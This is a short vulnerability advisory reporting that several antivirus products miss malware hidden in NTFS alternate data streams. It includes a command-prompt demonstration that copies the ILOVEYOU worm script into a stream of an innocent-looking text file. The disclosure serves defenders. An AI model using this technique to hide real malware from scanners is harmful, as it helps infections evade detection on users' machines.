Multiple Vendor NTFS Data Stream Malware Stealth Technique ---------------------------------------------------------- Affected product/vendors: Panda Software. All products. ClamWin. All versions. Norman Virus Control. All versions. AVG Antivirus. Non-affected vendors: Mcaffe / Computer Associates Avira Antivir PersonalEdition Classic Technique Description ---------------------- It isn't in any way a new technique, the first proof of concept of hidding malware into an NTFS data stream was published at 2000. Apparently the technique wasn't so popular and due to this fact the 75% (or more) of the anti-virus industry have been ignore it. The technique is as simple as follow. Download a virus file, even an old one. Call it, in example, 'iloveyou.vbs'. Next, go to a command prompt: ------------------------------------------------------------------------------------------------------ C:\>echo I'm an inocent file. > file.txt C:\>type file.txt I'm an inocent file. C:\>dir Volume in drive C has no label. Volume Serial Number is 8475-DDEF Directory of C:\ 06/03/2006 01:10 Documents and Settings 03/06/2006 05:10 23 file.txt 03/06/2006 04:52 10.320 iloveyou.txt 03/06/2006 04:52 10.320 iloveyou.vbs 26/12/2005 00:51 Inetpub 03/06/2006 05:09 Program Files 29/05/2006 23:24 12 test1.vbs 03/06/2006 05:06 WINNT 4 File(s) 20.675 bytes 4 Dir(s) 2.539.368.448 bytes free C:\>type iloveyou.vbs > file.txt:virus.vbs C:\>type file.txt I'm an inocent file. C:\>more < file.txt:virus.vbs rem barok -loveletter(vbe) rem by: spyder / ispyder@mail.com / @GRAMMERSoft Group / (...) ---More--- ------------------------------------------------------------------------------------------------------ Now, try scanning your system with your preferred vulnerable antivirus product. The first file in a normal data stream 'iloveyou.vbs' will (surely) be detected but not the copy of it stored in an alternate data stream of the apparently innocent file c:\file.txt. Disclaimer ---------- The information in this advisory and any of its demonstrations is provided "as is" without any warranty of any kind. I am not liable for any direct or indirect damages caused as a result of using the information or demonstrations provided in any part of this advisory. --------------------------------------------------------------------------- Contact ------- Joxean Koret at joxeanpiti<<<<<<<<@>>>>>>>>yah00<<<<<>>>>es